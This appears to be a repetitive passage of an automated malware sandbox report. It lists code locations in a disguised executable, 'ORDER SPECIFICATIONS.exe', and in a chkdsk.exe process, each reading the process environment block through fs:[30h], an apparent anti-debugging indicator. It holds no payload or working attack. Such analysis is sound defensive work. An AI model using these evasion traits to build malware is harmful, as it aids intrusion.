Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]	5_2_014C9240
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158EA55 mov eax, dword ptr fs:[00000030h]	5_2_0158EA55
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0150927A mov eax, dword ptr fs:[00000030h]	5_2_0150927A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0157B260 mov eax, dword ptr fs:[00000030h]	5_2_0157B260
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0157B260 mov eax, dword ptr fs:[00000030h]	5_2_0157B260
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01598A62 mov eax, dword ptr fs:[00000030h]	5_2_01598A62
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D8A0A mov eax, dword ptr fs:[00000030h]	5_2_014D8A0A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158AA16 mov eax, dword ptr fs:[00000030h]	5_2_0158AA16
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158AA16 mov eax, dword ptr fs:[00000030h]	5_2_0158AA16
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E3A1C mov eax, dword ptr fs:[00000030h]	5_2_014E3A1C
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CAA16 mov eax, dword ptr fs:[00000030h]	5_2_014CAA16
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CAA16 mov eax, dword ptr fs:[00000030h]	5_2_014CAA16
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C5210 mov eax, dword ptr fs:[00000030h]	5_2_014C5210
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C5210 mov ecx, dword ptr fs:[00000030h]	5_2_014C5210
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C5210 mov eax, dword ptr fs:[00000030h]	5_2_014C5210
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C5210 mov eax, dword ptr fs:[00000030h]	5_2_014C5210
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01504A2C mov eax, dword ptr fs:[00000030h]	5_2_01504A2C
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01504A2C mov eax, dword ptr fs:[00000030h]	5_2_01504A2C
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F2ACB mov eax, dword ptr fs:[00000030h]	5_2_014F2ACB
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F2AE4 mov eax, dword ptr fs:[00000030h]	5_2_014F2AE4
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FD294 mov eax, dword ptr fs:[00000030h]	5_2_014FD294
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FD294 mov eax, dword ptr fs:[00000030h]	5_2_014FD294
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]	5_2_014C52A5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]	5_2_014C52A5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]	5_2_014C52A5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]	5_2_014C52A5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]	5_2_014C52A5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DAAB0 mov eax, dword ptr fs:[00000030h]	5_2_014DAAB0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DAAB0 mov eax, dword ptr fs:[00000030h]	5_2_014DAAB0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FFAB0 mov eax, dword ptr fs:[00000030h]	5_2_014FFAB0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01503D43 mov eax, dword ptr fs:[00000030h]	5_2_01503D43
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01543540 mov eax, dword ptr fs:[00000030h]	5_2_01543540
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01573D40 mov eax, dword ptr fs:[00000030h]	5_2_01573D40
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E7D50 mov eax, dword ptr fs:[00000030h]	5_2_014E7D50
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EC577 mov eax, dword ptr fs:[00000030h]	5_2_014EC577
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EC577 mov eax, dword ptr fs:[00000030h]	5_2_014EC577
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158E539 mov eax, dword ptr fs:[00000030h]	5_2_0158E539
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0154A537 mov eax, dword ptr fs:[00000030h]	5_2_0154A537
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01598D34 mov eax, dword ptr fs:[00000030h]	5_2_01598D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F4D3B mov eax, dword ptr fs:[00000030h]	5_2_014F4D3B
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F4D3B mov eax, dword ptr fs:[00000030h]	5_2_014F4D3B
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F4D3B mov eax, dword ptr fs:[00000030h]	5_2_014F4D3B
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]	5_2_014D3D34
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CAD30 mov eax, dword ptr fs:[00000030h]	5_2_014CAD30
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]	5_2_01546DC9
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]	5_2_01546DC9
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]	5_2_01546DC9
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546DC9 mov ecx, dword ptr fs:[00000030h]	5_2_01546DC9
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]	5_2_01546DC9
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]	5_2_01546DC9
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01578DF1 mov eax, dword ptr fs:[00000030h]	5_2_01578DF1
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DD5E0 mov eax, dword ptr fs:[00000030h]	5_2_014DD5E0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DD5E0 mov eax, dword ptr fs:[00000030h]	5_2_014DD5E0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0158FDE2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0158FDE2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0158FDE2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0158FDE2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]	5_2_014C2D8A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]	5_2_014C2D8A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]	5_2_014C2D8A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]	5_2_014C2D8A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]	5_2_014C2D8A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]	5_2_014F2581
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]	5_2_014F2581
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]	5_2_014F2581
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]	5_2_014F2581
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FFD9B mov eax, dword ptr fs:[00000030h]	5_2_014FFD9B
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FFD9B mov eax, dword ptr fs:[00000030h]	5_2_014FFD9B
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F35A1 mov eax, dword ptr fs:[00000030h]	5_2_014F35A1
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015905AC mov eax, dword ptr fs:[00000030h]	5_2_015905AC
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015905AC mov eax, dword ptr fs:[00000030h]	5_2_015905AC
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_014F1DB5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_014F1DB5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F1DB5 mov eax, dword ptr fs:[00000030h]	5_2_014F1DB5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FA44B mov eax, dword ptr fs:[00000030h]	5_2_014FA44B
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155C450 mov eax, dword ptr fs:[00000030h]	5_2_0155C450
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155C450 mov eax, dword ptr fs:[00000030h]	5_2_0155C450
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E746D mov eax, dword ptr fs:[00000030h]	5_2_014E746D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0159740D mov eax, dword ptr fs:[00000030h]	5_2_0159740D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0159740D mov eax, dword ptr fs:[00000030h]	5_2_0159740D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0159740D mov eax, dword ptr fs:[00000030h]	5_2_0159740D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]	5_2_01581C06
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546C0A mov eax, dword ptr fs:[00000030h]	5_2_01546C0A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546C0A mov eax, dword ptr fs:[00000030h]	5_2_01546C0A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546C0A mov eax, dword ptr fs:[00000030h]	5_2_01546C0A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546C0A mov eax, dword ptr fs:[00000030h]	5_2_01546C0A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FBC2C mov eax, dword ptr fs:[00000030h]	5_2_014FBC2C
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01598CD6 mov eax, dword ptr fs:[00000030h]	5_2_01598CD6
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015814FB mov eax, dword ptr fs:[00000030h]	5_2_015814FB
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546CF0 mov eax, dword ptr fs:[00000030h]	5_2_01546CF0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546CF0 mov eax, dword ptr fs:[00000030h]	5_2_01546CF0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01546CF0 mov eax, dword ptr fs:[00000030h]	5_2_01546CF0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D849B mov eax, dword ptr fs:[00000030h]	5_2_014D849B
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DEF40 mov eax, dword ptr fs:[00000030h]	5_2_014DEF40
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DFF60 mov eax, dword ptr fs:[00000030h]	5_2_014DFF60
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01598F6A mov eax, dword ptr fs:[00000030h]	5_2_01598F6A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FA70E mov eax, dword ptr fs:[00000030h]	5_2_014FA70E
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FA70E mov eax, dword ptr fs:[00000030h]	5_2_014FA70E
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155FF10 mov eax, dword ptr fs:[00000030h]	5_2_0155FF10
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155FF10 mov eax, dword ptr fs:[00000030h]	5_2_0155FF10
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0159070D mov eax, dword ptr fs:[00000030h]	5_2_0159070D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0159070D mov eax, dword ptr fs:[00000030h]	5_2_0159070D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EF716 mov eax, dword ptr fs:[00000030h]	5_2_014EF716
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C4F2E mov eax, dword ptr fs:[00000030h]	5_2_014C4F2E
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C4F2E mov eax, dword ptr fs:[00000030h]	5_2_014C4F2E
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FE730 mov eax, dword ptr fs:[00000030h]	5_2_014FE730
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015037F5 mov eax, dword ptr fs:[00000030h]	5_2_015037F5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01547794 mov eax, dword ptr fs:[00000030h]	5_2_01547794
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01547794 mov eax, dword ptr fs:[00000030h]	5_2_01547794
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01547794 mov eax, dword ptr fs:[00000030h]	5_2_01547794
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D8794 mov eax, dword ptr fs:[00000030h]	5_2_014D8794
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]	5_2_014D7E41
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]	5_2_014D7E41
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]	5_2_014D7E41
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]	5_2_014D7E41
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]	5_2_014D7E41
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]	5_2_014D7E41
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158AE44 mov eax, dword ptr fs:[00000030h]	5_2_0158AE44
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158AE44 mov eax, dword ptr fs:[00000030h]	5_2_0158AE44
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D766D mov eax, dword ptr fs:[00000030h]	5_2_014D766D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]	5_2_014EAE73
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]	5_2_014EAE73
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]	5_2_014EAE73
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]	5_2_014EAE73
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]	5_2_014EAE73
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CC600 mov eax, dword ptr fs:[00000030h]	5_2_014CC600
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CC600 mov eax, dword ptr fs:[00000030h]	5_2_014CC600
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CC600 mov eax, dword ptr fs:[00000030h]	5_2_014CC600
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F8E00 mov eax, dword ptr fs:[00000030h]	5_2_014F8E00
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581608 mov eax, dword ptr fs:[00000030h]	5_2_01581608
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FA61C mov eax, dword ptr fs:[00000030h]	5_2_014FA61C
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FA61C mov eax, dword ptr fs:[00000030h]	5_2_014FA61C
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0157FE3F mov eax, dword ptr fs:[00000030h]	5_2_0157FE3F
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CE620 mov eax, dword ptr fs:[00000030h]	5_2_014CE620
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F36CC mov eax, dword ptr fs:[00000030h]	5_2_014F36CC
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01598ED6 mov eax, dword ptr fs:[00000030h]	5_2_01598ED6
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0157FEC0 mov eax, dword ptr fs:[00000030h]	5_2_0157FEC0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01508EC7 mov eax, dword ptr fs:[00000030h]	5_2_01508EC7
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F16E0 mov ecx, dword ptr fs:[00000030h]	5_2_014F16E0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D76E2 mov eax, dword ptr fs:[00000030h]	5_2_014D76E2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0155FE87 mov eax, dword ptr fs:[00000030h]	5_2_0155FE87
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015446A7 mov eax, dword ptr fs:[00000030h]	5_2_015446A7
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01590EA5 mov eax, dword ptr fs:[00000030h]	5_2_01590EA5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01590EA5 mov eax, dword ptr fs:[00000030h]	5_2_01590EA5
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01590EA5 mov eax, dword ptr fs:[00000030h]	5_2_01590EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05567D50 mov eax, dword ptr fs:[00000030h]	16_2_05567D50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556B944 mov eax, dword ptr fs:[00000030h]	16_2_0556B944
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556B944 mov eax, dword ptr fs:[00000030h]	16_2_0556B944
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05583D43 mov eax, dword ptr fs:[00000030h]	16_2_05583D43
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055C3540 mov eax, dword ptr fs:[00000030h]	16_2_055C3540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556C577 mov eax, dword ptr fs:[00000030h]	16_2_0556C577
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0556C577 mov eax, dword ptr fs:[00000030h]	16_2_0556C577
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554B171 mov eax, dword ptr fs:[00000030h]	16_2_0554B171
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554B171 mov eax, dword ptr fs:[00000030h]	16_2_0554B171
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554C962 mov eax, dword ptr fs:[00000030h]	16_2_0554C962
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05549100 mov eax, dword ptr fs:[00000030h]	16_2_05549100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05549100 mov eax, dword ptr fs:[00000030h]	16_2_05549100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05549100 mov eax, dword ptr fs:[00000030h]	16_2_05549100
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05618D34 mov eax, dword ptr fs:[00000030h]	16_2_05618D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]	16_2_05553D34
